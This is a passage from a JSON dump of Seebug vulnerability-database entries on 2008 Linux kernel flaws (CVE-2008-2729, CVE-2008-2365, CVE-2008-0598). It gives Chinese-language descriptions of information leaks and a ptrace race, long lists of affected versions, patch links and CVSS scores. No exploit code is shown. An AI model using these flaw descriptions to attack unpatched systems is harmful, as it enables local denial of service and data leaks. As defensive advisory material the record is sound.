href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17 .5\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17 .1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17 .7\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17 .13\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17 .10\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17 -rc5\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17 .14\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.18 .3\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.19 -rc2\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.19 -rc3\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.2\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.3\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.4\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.6 rc1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.6\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.7\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.8 rc2\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.8 rc1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.9\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>", "published": "2008-06-29T00:00:00", "type": "seebug", "title": "Linux\u5185\u6838\u5185\u5b58\u62f7\u8d1d\u5f02\u5e38\u672c\u5730\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2729"], "modified": "2008-06-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3496", "id": "SSV:3496", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T21:37:55", "description": "BUGTRAQ ID: 29945\r\nCVE ID\uff1aCVE-2008-2365\r\nCNCVE ID\uff1aCNCVE-20082365\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nLinux utrace/ptrace\u6302\u63a5\u548c\u5378\u8f7d\u5b58\u5728\u7ade\u4e89\u6761\u4ef6\u95ee\u9898\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5bf9\u7cfb\u7edf\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\nptrace_may_attach()\u5305\u542b\u5982\u4e0b\u4ee3\u7801\uff1a\r\n static int ptrace_attach(struct task_struct *task)\r\n {\r\n ...\r\n engine = utrace_attach(task, (UTRACE_ATTACH_CREATE\r\n | UTRACE_ATTACH_EXCLUSIVE\r\n | UTRACE_ATTACH_MATCH_OPS),\r\n &ptrace_utrace_ops, 0);\r\n [error checking]\r\n if (ptrace_may_attach(task)) {\r\n [more attaching process]\r\n\u5728\u8fdb\u884c\u6302\u63a5\u68c0\u67e5\u65f6\u5b58\u5728\u95ee\u9898\uff0c\u56e0\u4e3autrace_attach()\u4f1a\u4e0d\u4f5c\u68c0\u67e5\u7684\u5efa\u7acb\u548c\u4fee\u6539"struct utrace *"\uff0c\u5bfc\u81f4\u5728\u7528\u6237\u6ca1\u6709\u6743\u9650\u7684\u60c5\u51b5\u4e0b\u8fdb\u884c\u5efa\u7acb\u548c\u6302\u63a5\u64cd\u4f5c\uff0c\u89e6\u53d1\u7ade\u4e89\u6761\u4ef6\uff0c\u53ef\u80fd\u5bfc\u81f4\u5185\u6838\u5d29\u6e83\u3002 \n\nRedHat Enterprise Linux WS 4\r\nRedHat Enterprise Linux ES 4\r\nRedHat Enterprise Linux AS 4\r\nRedHat Desktop 4.0\r\nLinux kernel 2.6.25 .5\r\nLinux kernel 2.6.25\r\nLinux kernel 2.6.24 .2\r\nLinux kernel 2.6.24 .1\r\nLinux kernel 2.6.24 -rc5\r\nLinux kernel 2.6.24 -rc4\r\nLinux kernel 2.6.24 -rc3\r\nLinux kernel 2.6.23 .7\r\nLinux kernel 2.6.23 .6\r\nLinux kernel 2.6.23 .5\r\nLinux kernel 2.6.23 .4\r\nLinux kernel 2.6.23 .3\r\nLinux kernel 2.6.23 .2\r\nLinux kernel 2.6.23 -rc2\r\nLinux kernel 2.6.23 -rc1\r\nLinux kernel 2.6.23\r\nLinux kernel 2.6.22 7\r\nLinux kernel 2.6.22 1\r\nLinux kernel 2.6.22 .8\r\nLinux kernel 2.6.22 .6\r\nLinux kernel 2.6.22 .5\r\nLinux kernel 2.6.22 .4\r\nLinux kernel 2.6.22 .3\r\nLinux kernel 2.6.22 .17\r\nLinux kernel 2.6.22 .16\r\nLinux kernel 2.6.22 .15\r\nLinux kernel 2.6.22 .14\r\nLinux kernel 2.6.22 .13\r\nLinux kernel 2.6.22 .12\r\nLinux kernel 2.6.22 .11\r\nLinux kernel 2.6.22\r\nLinux kernel 2.6.22\r\nLinux kernel 2.6.21 4\r\nLinux kernel 2.6.21 .7\r\nLinux kernel 2.6.21 .6\r\nLinux kernel 2.6.21 .2\r\nLinux kernel 2.6.21 .1\r\nLinux kernel 2.6.21\r\nLinux kernel 2.6.21\r\nLinux kernel 2.6.21\r\nLinux kernel 2.6.20 .9\r\nLinux kernel 2.6.20 .8\r\nLinux kernel 2.6.20 .5\r\nLinux kernel 2.6.20 .4\r\nLinux kernel 2.6.20 .15\r\nLinux kernel 2.6.20\r\nLinux kernel 2.6.20\r\nLinux kernel 2.6.19 1\r\nLinux kernel 2.6.19 .2\r\nLinux kernel 2.6.19 .1\r\nLinux kernel 2.6.19 -rc4\r\nLinux kernel 2.6.19 -rc3\r\nLinux kernel 2.6.19 -rc2\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.19 -rc1\r\nLinux kernel 2.6.19\r\nLinux kernel 2.6.18 .4\r\nLinux kernel 2.6.18 .3\r\nLinux kernel 2.6.18 .1\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.17 .8\r\nLinux kernel 2.6.17 .7\r\nLinux kernel 2.6.17 .6\r\nLinux kernel 2.6.17 .5\r\nLinux kernel 2.6.17 .3\r\nLinux kernel 2.6.17 .2\r\nLinux kernel 2.6.17 .14\r\nLinux kernel 2.6.17 .13\r\nLinux kernel 2.6.17 .12\r\nLinux kernel 2.6.17 .11\r\nLinux kernel 2.6.17 .10\r\nLinux kernel 2.6.17 .1\r\nLinux kernel 2.6.17 -rc5\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.16 27\r\nLinux kernel 2.6.16 13\r\nLinux kernel 2.6.16 .9\r\nLinux kernel 2.6.16 .7\r\nLinux kernel 2.6.16 .23\r\nLinux kernel 2.6.16 .19\r\nLinux kernel 2.6.16 .12\r\nLinux kernel 2.6.16 .11\r\nLinux kernel 2.6.16 .1\r\nLinux kernel 2.6.16 -rc1\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.15 .4\r\nLinux kernel 2.6.15 .3\r\nLinux kernel 2.6.15 .2\r\nLinux kernel 2.6.15 .1\r\nLinux kernel 2.6.15 -rc3\r\nLinux kernel 2.6.15 -rc2\r\nLinux kernel 2.6.15 -rc1\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.14 .5\r\nLinux kernel 2.6.14 .4\r\nLinux kernel 2.6.14 .3\r\nLinux kernel 2.6.14 .2\r\nLinux kernel 2.6.14 .1\r\nLinux kernel 2.6.14 -rc4\r\nLinux kernel 2.6.14 -rc3\r\nLinux kernel 2.6.14 -rc2\r\nLinux kernel 2.6.14 -rc1\r\nLinux kernel 2.6.14\r\nLinux kernel 2.6.14\r\nLinux kernel 2.6.13 .4\r\nLinux kernel 2.6.13 .3\r\nLinux kernel 2.6.13 .2\r\nLinux kernel 2.6.13 .1\r\nLinux kernel 2.6.13 -rc7\r\nLinux kernel 2.6.13 -rc6\r\nLinux kernel 2.6.13 -rc4\r\nLinux kernel 2.6.13 -rc1\r\nLinux kernel 2.6.13\r\nLinux kernel 2.6.13\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.12 .6\r\nLinux kernel 2.6.12 .5\r\nLinux kernel 2.6.12 .4\r\nLinux kernel 2.6.12 .3\r\nLinux kernel 2.6.12 .22\r\nLinux kernel 2.6.12 .2\r\nLinux kernel 2.6.12 .12\r\nLinux kernel 2.6.12 .1\r\nLinux kernel 2.6.12 -rc5\r\nLinux kernel 2.6.12 -rc4\r\nLinux kernel 2.6.12 -rc1\r\nLinux kernel 2.6.12\r\nLinux kernel 2.6.12\r\nLinux kernel 2.6.11 .8\r\nLinux kernel 2.6.11 .7\r\nLinux kernel 2.6.11 .6\r\nLinux kernel 2.6.11 .5\r\nLinux kernel 2.6.11 .4\r\nLinux kernel 2.6.11 .12\r\nLinux kernel 2.6.11 .11\r\nLinux kernel 2.6.11 -rc4\r\nLinux kernel 2.6.11 -rc3\r\nLinux kernel 2.6.11 -rc2\r\nLinux kernel 2.6.11\r\nLinux kernel 2.6.11\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.10 rc2\r\nLinux kernel 2.6.10\r\n+ RedHat Fedora Core3\r\n+ RedHat Fedora Core2\r\n+ Trustix Secure Linux 3.0\r\n+ Ubuntu Ubuntu Linux 5.0 4 powerpc\r\n+ Ubuntu Ubuntu Linux 5.0 4 i386\r\n+ Ubuntu Ubuntu Linux 5.0 4 amd64\r\nLinux kernel 2.6.10\r\nLinux kernel 2.6.9\r\nLinux kernel 2.6.25.4\r\nLinux kernel 2.6.25.3\r\nLinux kernel 2.6.25.2\r\nLinux kernel 2.6.25.1\r\nLinux kernel 2.6.24.6\r\nLinux kernel 2.6.24-rc2\r\nLinux kernel 2.6.24-rc1\r\nLinux kernel 2.6.23.14\r\nLinux kernel 2.6.23.10\r\nLinux kernel 2.6.23.1\r\nLinux kernel 2.6.23.09\r\nLinux kernel 2.6.22-rc7\r\nLinux kernel 2.6.22-rc1\r\nLinux kernel 2.6.21-RC6\r\nLinux kernel 2.6.21-RC5\r\nLinux kernel 2.6.21-RC4\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.20.3\r\nLinux kernel 2.6.20.2\r\nLinux kernel 2.6.20.13\r\nLinux kernel 2.6.20.11\r\nLinux kernel 2.6.20.1\r\nLinux kernel 2.6.20-rc2\r\nLinux kernel 2.6.20-2\r\nLinux kernel 2.6.18-8.1.8.el5\r\nLinux kernel 2.6.18-53\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.15.5\r\nLinux kernel 2.6.15.11\r\nLinux kernel 2.6.15-27.48\r\nLinux kernel 2.6.11.4\n \u53ef\u53c2\u8003\u5982\u4e0b\u8865\u4e01\uff1a\r\nLinux kernel 2.6.25.3\r\nLinux [PATCH] fix zap_thread's ptrace related problems\r\n<a href=http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a= target=_blank>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a=</a> commit;h=5ecfbae093f0c37311e89b29bfc0c9d586eace87\r\nLinux Fix ptrace_attach()/ptrace_traceme()/de_thread() race\r\n<a href=http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a= target=_blank>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a=</a> commit;h=f5b40e363ad6041a96e3da32281d8faa191597b9\r\nLinux ptrace_attach: fix possible deadlock schenario with irqs\r\n<a href=http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a= target=_blank>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a=</a> commit;h=f358166a9405e4f1d8e50d8f415c26d95505b6de\r\nLinux kernel 2.6.25.2\r\nLinux [PATCH] fix zap_thread's ptrace related problems\r\n<a href=http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a= target=_blank>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a=</a> commit;h=5ecfbae093f0c37311e89b29bfc0c9d586eace87\r\nLinux Fix ptrace_attach()/ptrace_traceme()/de_thread() race\r\n<a href=http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a= target=_blank>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a=</a> commit;h=f5b40e363ad6041a96e3da32281d8faa191597b9\r\nLinux ptrace_attach: fix possible deadlock schenario with irqs\r\n<a href=http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a= target=_blank>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a=</a> commit;h=f358166a9405e4f1d8e50d8f415c26d95505b6de\r\nLinux kernel 2.6.25 .5\r\nLinux [PATCH] fix zap_thread's ptrace related problems\r\n<a href=http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a= target=_blank>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a=</a> commit;h=5ecfbae093f0c37311e89b29bfc0c9d586eace87\r\nLinux Fix ptrace_attach()/ptrace_traceme()/de_thread() race\r\n<a href=http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a= target=_blank>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a=</a> commit;h=f5b40e363ad6041a96e3da32281d8faa191597b9\r\nLinux ptrace_attach: fix possible deadlock schenario with irqs\r\n<a href=http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a= target=_blank>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git;a=</a> commit;h=f358166a9405e4f1d8e50d8f415c26d95505b6de", "published": "2008-06-29T00:00:00", "type": "seebug", "title": "Linux Kernel utrace\u548cptrace\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2365"], "modified": "2008-06-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3494", "id": "SSV:3494", "sourceData": "\n /* This software is provided 'as-is', without any express or implied\r\n warranty. In no event will the authors be held liable&n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-3494", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:37:49", "description": "BUGTRAQ ID: 29942\r\nCVE ID\uff1aCVE-2008-0598\r\nCNCVE ID\uff1aCNCVE-20080598\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nLinux 32\u548c64\u4f4d\u4eff\u771f\u6a21\u62df\u5b58\u5728\u7f3a\u9677\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u6784\u5efa\u7279\u6b8a\u7684\u7a0b\u5e8f\uff0c\u89e6\u53d1\u6cc4\u6f0f\u672a\u521d\u59cb\u5316\u5185\u5b58\u800c\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f\u3002\r\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u6f0f\u6d1e\u7ec6\u8282\u63d0\u4f9b\u3002\n\nRedHat Enterprise Linux WS 4\r\nRedHat Enterprise Linux ES 4\r\nRedHat Enterprise Linux Desktop 5 client\r\nRedHat Enterprise Linux AS 4\r\nRedHat Enterprise Linux Desktop version 4\r\nRedHat Enterprise Linux 5 server\r\nLinux kernel 2.6.26 -rc6\r\nLinux kernel 2.6.25 .5\r\nLinux kernel 2.6.25\r\nLinux kernel 2.6.25\r\nLinux kernel 2.6.24 .2\r\nLinux kernel 2.6.24 .1\r\nLinux kernel 2.6.24 -rc5\r\nLinux kernel 2.6.24 -rc4\r\nLinux kernel 2.6.24 -rc3\r\nLinux kernel 2.6.23 .7\r\nLinux kernel 2.6.23 .6\r\nLinux kernel 2.6.23 .5\r\nLinux kernel 2.6.23 .4\r\nLinux kernel 2.6.23 .3\r\nLinux kernel 2.6.23 .2\r\nLinux kernel 2.6.23 -rc2\r\nLinux kernel 2.6.23 -rc1\r\nLinux kernel 2.6.23\r\nLinux kernel 2.6.22 7\r\nLinux kernel 2.6.22 1\r\nLinux kernel 2.6.22 .8\r\nLinux kernel 2.6.22 .6\r\nLinux kernel 2.6.22 .5\r\nLinux kernel 2.6.22 .4\r\nLinux kernel 2.6.22 .3\r\nLinux kernel 2.6.22 .17\r\nLinux kernel 2.6.22 .16\r\nLinux kernel 2.6.22 .15\r\nLinux kernel 2.6.22 .14\r\nLinux kernel 2.6.22 .13\r\nLinux kernel 2.6.22 .12\r\nLinux kernel 2.6.22 .11\r\nLinux kernel 2.6.22\r\nLinux kernel 2.6.22\r\nLinux kernel 2.6.21 4\r\nLinux kernel 2.6.21 .7\r\nLinux kernel 2.6.21 .6\r\nLinux kernel 2.6.21 .2\r\nLinux kernel 2.6.21 .1\r\nLinux kernel 2.6.21\r\nLinux kernel 2.6.21\r\nLinux kernel 2.6.21\r\nLinux kernel 2.6.20 .9\r\nLinux kernel 2.6.20 .8\r\nLinux kernel 2.6.20 .5\r\nLinux kernel 2.6.20 .4\r\nLinux kernel 2.6.20 .15\r\nLinux kernel 2.6.20\r\nLinux kernel 2.6.20\r\nLinux kernel 2.6.19 1\r\nLinux kernel 2.6.19 .2\r\nLinux kernel 2.6.19 .1\r\nLinux kernel 2.6.19 -rc4\r\nLinux kernel 2.6.19 -rc3\r\nLinux kernel 2.6.19 -rc2\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.19 -rc1\r\nLinux kernel 2.6.19\r\nLinux kernel 2.6.18 .4\r\nLinux kernel 2.6.18 .3\r\nLinux kernel 2.6.18 .1\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.17 .8\r\nLinux kernel 2.6.17 .7\r\nLinux kernel 2.6.17 .6\r\nLinux kernel 2.6.17 .5\r\nLinux kernel 2.6.17 .3\r\nLinux kernel 2.6.17 .2\r\nLinux kernel 2.6.17 .14\r\nLinux kernel 2.6.17 .13\r\nLinux kernel 2.6.17 .12\r\nLinux kernel 2.6.17 .11\r\nLinux kernel 2.6.17 .10\r\nLinux kernel 2.6.17 .1\r\nLinux kernel 2.6.17 -rc5\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.16 27\r\nLinux kernel 2.6.16 13\r\nLinux kernel 2.6.16 .9\r\nLinux kernel 2.6.16 .7\r\nLinux kernel 2.6.16 .23\r\nLinux kernel 2.6.16 .19\r\nLinux kernel 2.6.16 .12\r\nLinux kernel 2.6.16 .11\r\nLinux kernel 2.6.16 .1\r\nLinux kernel 2.6.16 -rc1\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.15 .4\r\nLinux kernel 2.6.15 .3\r\nLinux kernel 2.6.15 .2\r\nLinux kernel 2.6.15 .1\r\nLinux kernel 2.6.15 -rc3\r\nLinux kernel 2.6.15 -rc2\r\nLinux kernel 2.6.15 -rc1\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.14 .5\r\nLinux kernel 2.6.14 .4\r\nLinux kernel 2.6.14 .3\r\nLinux kernel 2.6.14 .2\r\nLinux kernel 2.6.14 .1\r\nLinux kernel 2.6.14 -rc4\r\nLinux kernel 2.6.14 -rc3\r\nLinux kernel 2.6.14 -rc2\r\nLinux kernel 2.6.14 -rc1\r\nLinux kernel 2.6.14\r\nLinux kernel 2.6.14\r\nLinux kernel 2.6.13 .4\r\nLinux kernel 2.6.13 .3\r\nLinux kernel 2.6.13 .2\r\nLinux kernel 2.6.13 .1\r\nLinux kernel 2.6.13 -rc7\r\nLinux kernel 2.6.13 -rc6\r\nLinux kernel 2.6.13 -rc4\r\nLinux kernel 2.6.13 -rc1\r\nLinux kernel 2.6.13\r\nLinux kernel 2.6.13\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.12 .6\r\nLinux kernel 2.6.12 .5\r\nLinux kernel 2.6.12 .4\r\nLinux kernel 2.6.12 .3\r\nLinux kernel 2.6.12 .22\r\nLinux kernel 2.6.12 .2\r\nLinux kernel 2.6.12 .12\r\nLinux kernel 2.6.12 .1\r\nLinux kernel 2.6.12 -rc5\r\nLinux kernel 2.6.12 -rc4\r\nLinux kernel 2.6.12 -rc1\r\nLinux kernel 2.6.12\r\nLinux kernel 2.6.12\r\nLinux kernel 2.6.11 .8\r\nLinux kernel 2.6.11 .7\r\nLinux kernel 2.6.11 .6\r\nLinux kernel 2.6.11 .5\r\nLinux kernel 2.6.11 .4\r\nLinux kernel 2.6.11 .12\r\nLinux kernel 2.6.11 .11\r\nLinux kernel 2.6.11 -rc4\r\nLinux kernel 2.6.11 -rc3\r\nLinux kernel 2.6.11 -rc2\r\nLinux kernel 2.6.11\r\nLinux kernel 2.6.11\r\nLinux kernel 2.6.10 rc2\r\nLinux kernel 2.6.10\r\nLinux kernel 2.6.10\r\nLinux kernel 2.6.9\r\nLinux kernel 2.6.8 rc3\r\nLinux kernel 2.6.8 rc2\r\nLinux kernel 2.6.8 rc1\r\n+ Ubuntu Ubuntu Linux 4.1 ppc\r\n+ Ubuntu Ubuntu Linux 4.1 ia64\r\n+ Ubuntu Ubuntu Linux 4.1 ia32\r\nLinux kernel 2.6.8\r\nLinux kernel 2.6.7 rc1\r\nLinux kernel 2.6.7\r\nLinux kernel 2.6.6 rc1\r\nLinux kernel 2.6.6\r\nLinux kernel 2.6.5\r\nLinux kernel 2.6.4\r\nLinux kernel 2.6.3\r\nLinux kernel 2.6.2\r\nLinux kernel 2.6.1 -rc2\r\nLinux kernel 2.6.1 -rc1\r\nLinux kernel 2.6.1\r\nLinux kernel 2.6 .10\r\nLinux kernel 2.6 -test9-CVS\r\nLinux kernel 2.6 -test9\r\nLinux kernel 2.6 -test8\r\nLinux kernel 2.6 -test7\r\nLinux kernel 2.6 -test6\r\nLinux kernel 2.6 -test5\r\nLinux kernel 2.6 -test4\r\nLinux kernel 2.6 -test3\r\nLinux kernel 2.6 -test2\r\nLinux kernel 2.6 -test11\r\nLinux kernel 2.6 -test10\r\nLinux kernel 2.6 -test1\r\nLinux kernel 2.6\r\nLinux kernel 2.4.36 5\r\nLinux kernel 2.4.36 4\r\nLinux kernel 2.4.36 1\r\nLinux kernel 2.4.36 .4\r\nLinux kernel 2.4.36\r\nLinux kernel 2.4.35 3\r\nLinux kernel 2.4.34\r\nLinux kernel 2.4.34\r\nLinux kernel 2.4.34\r\nLinux kernel 2.4.33 2\r\nLinux kernel 2.4.33 .7\r\nLinux kernel 2.4.33 .6\r\nLinux kernel 2.4.33 .6\r\nLinux kernel 2.4.33 .5\r\nLinux kernel 2.4.33 .4\r\nLinux kernel 2.4.33 .3\r\nLinux kernel 